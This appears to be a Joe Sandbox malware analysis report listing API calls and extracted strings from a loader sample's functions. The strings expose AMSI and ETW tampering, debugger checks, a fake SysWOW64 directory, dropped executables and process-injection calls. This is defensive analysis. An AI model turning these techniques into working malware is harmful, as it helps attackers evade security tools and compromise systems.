                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02897A9F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                            • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                            • API String ID: 4072585319-445027087
                                                                            • Opcode ID: 5138e5596df1fb293e01e591a31024de0c77f2614698e3f433f328bc3adecdc6
                                                                            • Instruction ID: 3f30e74c28a1bb4188170e041354a8a9ac0481035fa403ab4d6e1643fdb46d55
                                                                            • Opcode Fuzzy Hash: 5138e5596df1fb293e01e591a31024de0c77f2614698e3f433f328bc3adecdc6
                                                                            • Instruction Fuzzy Hash: 80112D7D654209BFEF04EFA8EC81FAEB7EEEB49710F544460B900D7640D674BA108B65
                                                                            Function 02897D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02897DEC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                            • String ID: Ntdll$yromeMlautriVetirW
                                                                            • API String ID: 2719805696-3542721025
                                                                            • Opcode ID: 3243da5a45c486ce9af9b0964825b3117436b4a01ea39120064faf223b4e3d47
                                                                            • Instruction ID: 01051ce042db71c0caa203074ab294e09f8d0923c3942836797940cb28fd2f97
                                                                            • Opcode Fuzzy Hash: 3243da5a45c486ce9af9b0964825b3117436b4a01ea39120064faf223b4e3d47
                                                                            • Instruction Fuzzy Hash: C50129BD65420AAFEF00EF98EC81E9EB7EDEB49B10F504850B900D7640D674BD108B65
                                                                            Function 0289DBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlI.N(?,?,00000000,0289DC7E), ref: 0289DC2C
                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0289DC7E), ref: 0289DC42
                                                                            • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0289DC7E), ref: 0289DC61
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Path$DeleteFileNameName_
                                                                            • String ID:
                                                                            • API String ID: 4284456518-0
                                                                            • Opcode ID: e1297fbf0674e24f27cba8962d58d34cd041a7d97f3093264ae7a1154d6af2a8
                                                                            • Instruction ID: 11a53bc1c80c107cc704faa33edc42cec0701df36791c8009566191f95d8527e
                                                                            • Opcode Fuzzy Hash: e1297fbf0674e24f27cba8962d58d34cd041a7d97f3093264ae7a1154d6af2a8
                                                                            • Instruction Fuzzy Hash: 6D014F7D944209AEEF05FBA4CD41FCD77B9AB44708F5544929200E7181EAB5AB04CB2A
                                                                            Function 0289DC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 02884F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02884F2E
                                                                            • RtlI.N(?,?,00000000,0289DC7E), ref: 0289DC2C
                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0289DC7E), ref: 0289DC42
                                                                            • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0289DC7E), ref: 0289DC61
                                                                              • Part of subcall function 02884C60: SysFreeString.OLEAUT32(0289F4A4), ref: 02884C6E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                            • String ID:
                                                                            • API String ID: 1530111750-0
                                                                            • Opcode ID: d719b35fbec2a191f3940d21165c900d084af3c11bb66cfc471fe3d57c2436b6
                                                                            • Instruction ID: 999b557ea50d027eeb4671a69a8098266fa9836d8f704091d1154994b6655470
                                                                            • Opcode Fuzzy Hash: d719b35fbec2a191f3940d21165c900d084af3c11bb66cfc471fe3d57c2436b6
                                                                            • Instruction Fuzzy Hash: 5901F47E94020DBEEB11FBA4DD42FCDB3BDEB48700F5144A1E601E7580EB746B048A69
                                                                            Function 02896DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 02896D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02896DB9,?,?,?,00000000), ref: 02896D99
                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,02896EAC,00000000,00000000,02896E2B,?,00000000,02896E9B), ref: 02896E17
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFromInstanceProg
                                                                            • String ID:
                                                                            • API String ID: 2151042543-0
                                                                            • Opcode ID: 1b6339a673e40ec82914aa24045a8726ead5e16156fa5f4393e66bbf56268f71
                                                                            • Instruction ID: a039731802cb8caff4383d961dcdab55f2f7962580b2e2528157dfa73db42d2b
                                                                            • Opcode Fuzzy Hash: 1b6339a673e40ec82914aa24045a8726ead5e16156fa5f4393e66bbf56268f71
                                                                            • Instruction Fuzzy Hash: 7301F23D208704AEFB15EFA9DC2296FBBBDE749B00B620875F405E2780F635A900C861
                                                                            Function 0289AD98 Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0289AB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0289ADA3,?,?,0289AE35,00000000,0289AF11), ref: 0289AB30
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0289AB48
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0289AB5A
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0289AB6C
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0289AB7E
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0289AB90
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0289ABA2
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 0289ABB4
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0289ABC6
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0289ABD8
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0289ABEA
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0289ABFC
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0289AC0E
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 0289AC20
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0289AC32
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0289AC44
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0289AC56
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,0289AE35,00000000,0289AF11), ref: 0289ADA9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 2242398760-0
                                                                            • Opcode ID: 67e5e0e33a9fda17caf042bb94643fb17cfd4c3d9a393c96a9f14a00845176ba
                                                                            • Instruction ID: a7ba233ade50034da873685eb9f59d264c5ce755b0a8f73d28648095fe236d7b
                                                                            • Opcode Fuzzy Hash: 67e5e0e33a9fda17caf042bb94643fb17cfd4c3d9a393c96a9f14a00845176ba
                                                                            • Instruction Fuzzy Hash: 5AC08CBB7022201B8E2466FC3CC89D7878DCD8A1B730808A2F908E3102D7259C1092E0
                                                                            Function 0289F7C8 Relevance: 229.6, APIs: 8, Strings: 118, Instructions: 9071COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InetIsOffline.URL(00000000,00000000,028AB784,?,?,?,00000000,00000000), ref: 0289F801
                                                                              • Part of subcall function 028989D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0290738C,Function_0000662C,00000004,0290739C,0290738C,05F5E103,00000040,029073A0,74AE0000,00000000,00000000), ref: 02898AAA
                                                                              • Part of subcall function 0289F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,0289FAEB,UacInitialize,02907380,028AB7B8,OpenSession,02907380,028AB7B8,ScanBuffer,02907380,028AB7B8,ScanString,02907380,028AB7B8,Initialize), ref: 0289F6EE
                                                                              • Part of subcall function 0289F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0289F700
                                                                              • Part of subcall function 0289F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 0289F754
                                                                              • Part of subcall function 0289F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0289F766
                                                                              • Part of subcall function 0289F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0289F77D
                                                                              • Part of subcall function 02887E5C: GetFileAttributesA.KERNEL32(00000000,?,028A041F,ScanString,02907380,028AB7B8,OpenSession,02907380,028AB7B8,ScanString,02907380,028AB7B8,UacScan,02907380,028AB7B8,UacInitialize), ref: 02887E67
                                                                              • Part of subcall function 0288C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029FB8B8,?,028A0751,ScanBuffer,02907380,028AB7B8,OpenSession,02907380,028AB7B8,ScanBuffer,02907380,028AB7B8,OpenSession), ref: 0288C37B
                                                                              • Part of subcall function 0289DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0289DE40), ref: 0289DDAB
                                                                              • Part of subcall function 0289DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0289DE40), ref: 0289DDDB
                                                                              • Part of subcall function 0289DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0289DDF0
                                                                              • Part of subcall function 0289DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0289DE1C
                                                                              • Part of subcall function 0289DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0289DE25
                                                                              • Part of subcall function 02887E80: GetFileAttributesA.KERNEL32(00000000,?,028A356F,ScanString,02907380,028AB7B8,OpenSession,02907380,028AB7B8,ScanBuffer,02907380,028AB7B8,OpenSession,02907380,028AB7B8,Initialize), ref: 02887E8B
                                                                              • Part of subcall function 02888048: CreateDirectoryA.KERNEL32(00000000,00000000,?,028A370D,OpenSession,02907380,028AB7B8,ScanString,02907380,028AB7B8,Initialize,02907380,028AB7B8,ScanString,02907380,028AB7B8), ref: 02888055
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                            • String ID: /d $ /o$.url$8gkD$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                            • API String ID: 297057983-2209947385
                                                                            • Opcode ID: 5db27fdaa370ac8bd8712d221169b29c5ad528f327b34ae0f3f0b3ac79695c90
                                                                            • Instruction ID: 3132ff2f68fee6027e1a0a510e88853693440e5c8ad7dddcaad6b92c029220ff
                                                                            • Opcode Fuzzy Hash: 5db27fdaa370ac8bd8712d221169b29c5ad528f327b34ae0f3f0b3ac79695c90
                                                                            • Instruction Fuzzy Hash: 41141B3EA0411E8FEB50FB68DC90ADE73B6AF99704F1040E1A009EB615DE71AE55CF46
                                                                            Function 028A3E12 Relevance: 43.3, APIs: 3, Strings: 24, Instructions: 2804sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 028989D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0290738C,Function_0000662C,00000004,0290739C,0290738C,05F5E103,00000040,029073A0,74AE0000,00000000,00000000), ref: 02898AAA
                                                                              • Part of subcall function 0289DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0289DD5E), ref: 0289DCCB
                                                                              • Part of subcall function 0289DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0289DD05
                                                                              • Part of subcall function 0289DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0289DD32
                                                                              • Part of subcall function 0289DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0289DD3B
                                                                            • Sleep.KERNEL32(000003E8,ScanBuffer,02907380,028AB7B8,UacScan,02907380,028AB7B8,ScanString,02907380,028AB7B8,028ABB30,00000000,00000000,028ABB24,00000000,00000000), ref: 028A40CB
                                                                              • Part of subcall function 028988B8: LoadLibraryW.KERNEL32(amsi), ref: 028988C1
                                                                              • Part of subcall function 028988B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02898920
                                                                            • Sleep.KERNEL32(000003E8,ScanBuffer,02907380,028AB7B8,OpenSession,02907380,028AB7B8,UacScan,02907380,028AB7B8,000003E8,ScanBuffer,02907380,028AB7B8,UacScan,02907380), ref: 028A4277
                                                                              • Part of subcall function 0289894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize,029073A8,0289A93C,UacScan), ref: 02898960
                                                                              • Part of subcall function 0289894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0289897A
                                                                              • Part of subcall function 0289894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize), ref: 028989B6
                                                                            • Sleep.KERNEL32(00004E20,UacScan,02907380,028AB7B8,ScanString,02907380,028AB7B8,ScanBuffer,02907380,028AB7B8,OpenSession,02907380,028AB7B8,UacInitialize,02907380,028AB7B8), ref: 028A50EE
                                                                              • Part of subcall function 0289DC04: RtlI.N(?,?,00000000,0289DC7E), ref: 0289DC2C
                                                                              • Part of subcall function 0289DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0289DC7E), ref: 0289DC42
                                                                              • Part of subcall function 0289DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0289DC7E), ref: 0289DC61
                                                                              • Part of subcall function 02887E5C: GetFileAttributesA.KERNEL32(00000000,?,028A041F,ScanString,02907380,028AB7B8,OpenSession,02907380,028AB7B8,ScanString,02907380,028AB7B8,UacScan,02907380,028AB7B8,UacInitialize), ref: 02887E67
                                                                              • Part of subcall function 028985BC: WinExec.KERNEL32(?,?), ref: 02898624
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                            • String ID: /d $ /o$.url$8gkD$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                            • API String ID: 2171786310-3836550919
                                                                            • Opcode ID: e61033d478b9bbc749006ae51b88b3a4fb62cd4d379b745bce25de4c33d49f37
                                                                            • Instruction ID: bcfb07cf90cb0234e1322f194dd0af082b4f0b90bc5bdda0fdec4081c9c133a3
                                                                            • Opcode Fuzzy Hash: e61033d478b9bbc749006ae51b88b3a4fb62cd4d379b745bce25de4c33d49f37
                                                                            • Instruction Fuzzy Hash: DD430E3EA0415E8FEB60FB68DC90A9E73B6BF99704F1040E29009E7615DE71AE45CF46
                                                                            Function 0289E678 Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562synchronizationCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 10197 289e678-289e67c 10198 289e681-289e686 10197->10198 10198->10198 10199 289e688-289ec81 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884740 * 2 call 2884860 call 2884778 call 28830d4 call 28846d4 * 2 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884740 call 2887f2c call 28849a0 call 2884d74 call 2884df0 call 2884740 call 28849a0 call 2884d74 call 2884df0 call 2898788 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28847ec call 28849a0 call 289894c call 2884860 call 28849a0 call 28847ec call 28849a0 call 289894c call 2884860 call 28849a0 call 28847ec call 28849a0 call 289894c call 2884860 call 28849a0 call 28847ec call 28849a0 call 289894c 10198->10199 10402 289eee2-289ef2f call 2884500 call 2884c60 call 2884500 call 2884c60 call 2884500 10199->10402 10403 289ec87-289eedd call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 WaitForSingleObject CloseHandle * 2 call 2884860 call 28849a0 call 28847ec call 28849a0 call 289894c call 2884860 call 28849a0 call 28847ec call 28849a0 call 289894c call 2884860 call 28849a0 call 28847ec call 28849a0 call 289894c call 2884860 call 28849a0 call 28847ec call 28849a0 call 289894c * 3 10199->10403 10403->10402
                                                                            APIs
                                                                              • Part of subcall function 028989D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0290738C,Function_0000662C,00000004,0290739C,0290738C,05F5E103,00000040,029073A0,74AE0000,00000000,00000000), ref: 02898AAA
                                                                              • Part of subcall function 02898788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02898814
                                                                              • Part of subcall function 0289894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize,029073A8,0289A93C,UacScan), ref: 02898960
